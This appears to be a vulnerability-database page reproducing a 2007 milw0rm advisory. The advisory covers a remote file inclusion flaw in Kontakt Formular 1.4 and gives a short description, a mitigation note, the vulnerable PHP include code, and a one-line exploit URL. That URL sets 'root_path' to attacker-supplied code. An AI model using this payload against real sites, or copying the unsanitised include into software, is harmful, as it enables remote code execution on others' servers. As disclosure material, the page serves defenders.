header-logo
Suggest Exploit
vendor:
Kontakt Formular
by:
bd0rk
7.5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: Kontakt Formular
Affected Version From: Not specified
Affected Version To: Not specified
Patch Exists: NO
Related CWE: Not available
CPE: Not specified
Metasploit:
Other Scripts:
Platforms Tested: Not specified
2007

Kontakt Formular 1.4 Remote File Inclusion Vulnerability

The vulnerability allows an attacker to include arbitrary files from a remote server by exploiting the 'root_path' parameter in the 'function.php' file. By manipulating the 'root_path' parameter, an attacker can execute malicious code on the target server.

Mitigation:

The vendor should release a patch to sanitize user input and prevent remote file inclusion attacks. In the meantime, users should avoid using the vulnerable version of the software or implement a web application firewall (WAF) to filter out malicious input.
Source

Exploit-DB raw data:

                   ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
                   +                                                          +
                   + Kontakt Formular 1.4 Remote File Inclusion Vulnerability +
                   +                                                          +
                   +                  Discovered by bd0rk                     +
                   +                                                          +
                   ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++



Vendor: http://www.mapos-scripts.de

Download: http://www.mapos-scripts.de/download,5.html

Vulnerable Code in /includes/function.php

-------------------------------------------------------------------

<?php
@session_start();

$datei_path = $datei_path ? $datei_path : $root_path."/index.php";
$datei_path = htmlentities($datei_path);
$kontakt_config=array();
include_once($root_path.'/includes/config.php');

-------------------------------------------------------------------

[+]Exploit: http://[target]/[path]/includes/function.php?root_path=[Shellcode]


Greetings: str0ke, TheJT, Luna-Tic, DNX


####The 19 years old german Hacker bd0rk####

Contact: bd0rk[at]hackermail.com

# milw0rm.com [2007-12-30]

Navigation

Suggest Exploit

Services By CQR